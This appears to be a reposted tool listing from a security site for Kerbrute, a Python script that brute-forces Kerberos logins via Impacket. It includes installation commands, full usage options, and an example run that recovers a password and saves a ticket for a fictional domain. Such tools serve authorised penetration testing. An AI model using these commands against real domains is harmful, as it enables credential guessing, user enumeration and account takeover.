Kerbrute - An Script To Perform Kerberos Bruteforcing By Using Impacket
An script to perform kerberos bruteforcing by using the Impacket library.
When is executed, as input it receives a user or list of users and a password or list of password. Then is performs a brute-force attack to enumerate:
- Valid username/passwords pairs
- Valid usernames
- Usernames without pre-authentication required
As a result, the script generates a list of valid credentials discovered, and the TGT's generated due those valid credentials.
Installation
From pypi:
pip3 install kerbrute
From repo:
git clone https://github.com/TarlogicSecurity/kerbrutecd kerbrutepip install -r requirements.txt
Use
Help without arguments:
[email protected]:~# kerbruteImpacket v0.9.18 - Copyright 2018 SecureAuth Corporationusage: kerbrute.py [-h] [-debug] (-user USER | -users USERS) [-password PASSWORD | -passwords PASSWORDS] -domain DOMAIN [-dc-ip <ip_address>] [-threads THREADS] [-outputfile OUTPUTFILE] [-no-save-ticket]optional arguments: -h, --help show this help message and exit -debug Turn DEBUG output ON -user USER User to perform bruteforcing -users USERS File with user per line -password PASSWORD Password to perform bruteforcing -passwords PASSWORDS File with password per line -domain DOMAIN Domain to perform bruteforcing -dc-ip <ip_address> IP Address of the domain controller -threads THREADS Number of threads to perform bruteforcing. Default = 1 -outputfile OUTPUTFILE File to save discovered user:password -no-save-ticket Do not save retrieved TGTs with correct credentialsExamples: ./kerbrute.py -users users_file.txt -passwords passwords_file.txt -domain contoso.com
Example of execution:
velociraptor [NOT PREAUTH] [*] Valid user => trex [*] Saved discovered passwords in jurassic_passwords.txt">
[email protected]:~# kerbrute -domain jurassic.park -users users.txt -passwords passwords.txt -outputfile jurassic_passwords.txtImpacket v0.9.18 - Copyright 2018 SecureAuth Corporation[*] Stupendous => triceratops:Sh4rpH0rns[*] Saved TGT in triceratops.ccache[*] Valid user => velociraptor [NOT PREAUTH][*] Valid user => trex[*] Saved discovered passwords in jurassic_passwords.txt
Source: www.kitploit.com
Kerbrute - An Script To Perform Kerberos Bruteforcing By Using Impacket
Reviewed by Anonymous
on
12:33 PM
Rating: